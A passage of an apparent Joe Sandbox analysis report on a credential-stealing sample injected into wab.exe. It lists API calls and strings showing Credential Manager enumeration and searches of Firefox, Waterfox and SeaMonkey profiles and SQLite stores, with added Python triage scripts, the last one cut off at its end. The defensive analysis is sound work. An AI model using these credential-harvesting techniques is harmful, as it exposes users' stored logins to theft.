                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3191383707-0
                                                                                                                                                                                                                      • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%
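The two listings above (the WinINet cache walk whose FindFirstUrlCacheEntryW search pattern is "visited:", and the CredEnumerateW call paired with _wcsnicmp filtering and LocalFree) are the evidence behind the credential-harvesting signatures in this report. The following added example is not part of the Joe Sandbox output or of the sample's code: it parses lines in the shape of the report's "APIs" listing into structured records and tags a function with capability labels derived from the API combinations it contains. The sample listing is constructed to mirror the lines above, the regular expression is an assumption about the export format (optional bullet, optional "Part of subcall function XXXXXXXX:" prefix, then Api.MODULE(args), ref: address), and the capability names are labels chosen here, not Joe Sandbox signature names.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample in the shape of the report's "APIs" listing (not a verbatim
# excerpt; addresses and arguments are modelled on the lines above).
SAMPLE_APIS = """\
• CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?), ref: 0040C467
• CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
• _wcsnicmp.MSVCRT ref: 0040BEFC
• LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
"""

# Assumed line grammar (an assumption about the export, not a documented format):
# [bullet] [Part of subcall function <addr>:] Api.MODULE[(arg,arg,...)][,] ref: <addr>
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list = field(default_factory=list)
    ref: int = 0                   # address of the call site
    subcall: Optional[int] = None  # callee function address when the call is made indirectly


def parse_line(line: str) -> Optional[ApiCall]:
    """Parse one listing line; returns None for headers and unrelated text."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw_args = m.group("args")
    args = [a.strip() for a in raw_args.split(",")] if raw_args is not None else []
    sub = m.group("sub")
    return ApiCall(
        api=m.group("api"),
        module=m.group("module").upper(),
        args=args,
        ref=int(m.group("ref"), 16),
        subcall=int(sub, 16) if sub else None,
    )


def parse_api_listing(text: str) -> list:
    return [c for c in (parse_line(ln) for ln in text.splitlines()) if c is not None]


def classify(calls: list) -> list:
    """Map API combinations to capability labels (labels chosen here, not report signatures)."""
    names = {c.api for c in calls}
    direct = {c.api for c in calls if c.subcall is None}
    found = []
    # Credential Manager enumeration: a NULL filter returns all of the caller's stored credentials.
    if names & {"CredEnumerateW", "CredEnumerateA"}:
        found.append("credential_manager_dump")
    # WinINet cache walk whose search pattern is "visited:", i.e. browsing-history entries.
    if any(c.api == "FindFirstUrlCacheEntryW" and c.args and c.args[0].lower().startswith("visited:")
           for c in calls):
        found.append("ie_history_harvest")
    # Value-by-value registry enumeration, as used to read stored account settings.
    if names & {"RegEnumValueW", "RegEnumValueA"}:
        found.append("registry_value_enum")
    # The same function opens a file with the wide API and also has the ANSI variant available.
    if {"CreateFileW", "CreateFileA"} <= direct:
        found.append("unicode_ansi_file_fallback")
    return sorted(found)


if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE_APIS)
    for call in parsed:
        where = f"via {call.subcall:08X}" if call.subcall is not None else "direct"
        print(f"{call.ref:08X} {call.module}!{call.api} ({where}) args={call.args}")
    print("capabilities:", classify(parsed))
```

Run against the listing of one function at a time, this gives a triage tag per function: the CredEnumerateW function above comes out as credential_manager_dump, and the function whose subcalls walk the URL cache with the "visited:" pattern and enumerate registry values comes out as ie_history_harvest plus registry_value_enum, which lines up with the Facebook, Yahoo and Google login URLs listed under its String ID.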

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 00403DDA
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
• String ID: Waterfox$Waterfox\Profiles
• API String ID: 3527940856-11920434
• Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
• Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
• Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
• Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00403E50
• memset.MSVCRT ref: 00403E65
• memset.MSVCRT ref: 00403E7A
• memset.MSVCRT ref: 00403E8F
• memset.MSVCRT ref: 00403EA4
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 00403F6B
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
• String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
• API String ID: 3527940856-2068335096
• Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
• Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
• Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
• Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00403FE1
• memset.MSVCRT ref: 00403FF6
• memset.MSVCRT ref: 0040400B
• memset.MSVCRT ref: 00404020
• memset.MSVCRT ref: 00404035
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 004040FC
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
• String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
• API String ID: 3527940856-3369679110
• Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
• Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
• Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
• Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
• API String ID: 3510742995-2641926074
• Opcode ID: ce3f0164aafa0249c1655987c9fd68d1cb4a7ac41c6f811fdb80cf943b1bed77
• Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
• Opcode Fuzzy Hash: ce3f0164aafa0249c1655987c9fd68d1cb4a7ac41c6f811fdb80cf943b1bed77
• Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 004033B7
• memcpy.MSVCRT ref: 004033D0
• wcscmp.MSVCRT ref: 004033FC
• _wcsicmp.MSVCRT ref: 00403439
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
• String ID: $0.@
• API String ID: 3030842498-1896041820
• Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
• Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2941347001-0
                                                                                                                                                                                                                      • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                      • API String ID: 3249829328-1174173950
                                                                                                                                                                                                                      • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 669240632-0
                                                                                                                                                                                                                      • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                      • String ID: "%s"
                                                                                                                                                                                                                      • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                      • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: AddressHandleModuleProcProcessTimes
• String ID: GetProcessTimes$kernel32.dll
• API String ID: 1714573020-3385500049
• Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
• Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
• Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
• Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004087D6
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
• memset.MSVCRT ref: 00408828
• memset.MSVCRT ref: 00408840
• memset.MSVCRT ref: 00408858
• memset.MSVCRT ref: 00408870
• memset.MSVCRT ref: 00408888
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
• String ID:
• API String ID: 2911713577-0
• Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
• Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
• Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
• Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memcmp
• String ID: @ $SQLite format 3
• API String ID: 1475443563-3708268960
• Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
• Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
• Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
• Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
Uniqueness
Uniqueness Score: -1.00%
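The function above pairs memcmp with the string "SQLite format 3", which is how a browser-credential recovery component recognises a profile database by its content rather than by its file name. The following is an added example, not code from the sample, from Joe Sandbox or from any project; it reproduces that header check in Python and decodes the fixed fields of the SQLite file header so an analyst can see what the comparison actually matches. The on-disk magic is 16 bytes including a terminating NUL, one byte longer than the printable string shown in the report. All sample inputs are constructed in memory; the file names are hypothetical.

```python
"""Identify SQLite databases by their 100-byte file header.

Added example (not from the analysed sample or from Joe Sandbox). The
sample buffers below are constructed so the script runs offline.
"""
import struct

# The report shows the 15 printable characters; the on-disk magic is
# NUL-terminated, so a correct comparison covers 16 bytes.
SQLITE_MAGIC = b"SQLite format 3\x00"
HEADER_LEN = 100  # the SQLite database header is the first 100 bytes of the file

TEXT_ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def is_sqlite_db(data: bytes) -> bool:
    """Content-based check: True iff the buffer starts with the full 16-byte magic."""
    return data[:len(SQLITE_MAGIC)] == SQLITE_MAGIC


def parse_sqlite_header(data: bytes) -> dict:
    """Decode the fixed, big-endian fields of the SQLite header."""
    if len(data) < HEADER_LEN or not is_sqlite_db(data):
        raise ValueError("not a SQLite 3 database header")
    (page_size,) = struct.unpack_from(">H", data, 16)
    if page_size == 1:  # the value 1 encodes a 65536-byte page
        page_size = 65536
    write_ver, read_ver = data[18], data[19]
    (db_size_pages,) = struct.unpack_from(">I", data, 28)
    (encoding,) = struct.unpack_from(">I", data, 56)
    (user_version,) = struct.unpack_from(">I", data, 60)
    (sqlite_version,) = struct.unpack_from(">I", data, 96)
    return {
        "page_size": page_size,
        "write_version": write_ver,
        "read_version": read_ver,
        "db_size_pages": db_size_pages,
        "text_encoding": TEXT_ENCODINGS.get(encoding, f"unknown({encoding})"),
        "user_version": user_version,
        "sqlite_version": sqlite_version,
    }


def build_header(page_size=4096, pages=3, encoding=1, sqlite_version=3042000) -> bytes:
    """Construct a syntactically valid SQLite header for testing (no real pages follow)."""
    hdr = bytearray(HEADER_LEN)
    hdr[0:16] = SQLITE_MAGIC
    struct.pack_into(">H", hdr, 16, 1 if page_size == 65536 else page_size)
    hdr[18] = hdr[19] = 1  # legacy (rollback-journal) file format versions
    hdr[21], hdr[22], hdr[23] = 64, 32, 32  # payload fractions fixed by the format
    struct.pack_into(">I", hdr, 28, pages)
    struct.pack_into(">I", hdr, 56, encoding)
    struct.pack_into(">I", hdr, 96, sqlite_version)
    return bytes(hdr)


def find_sqlite_stores(files: dict) -> list:
    """Return the names whose content, not extension, marks them as SQLite databases."""
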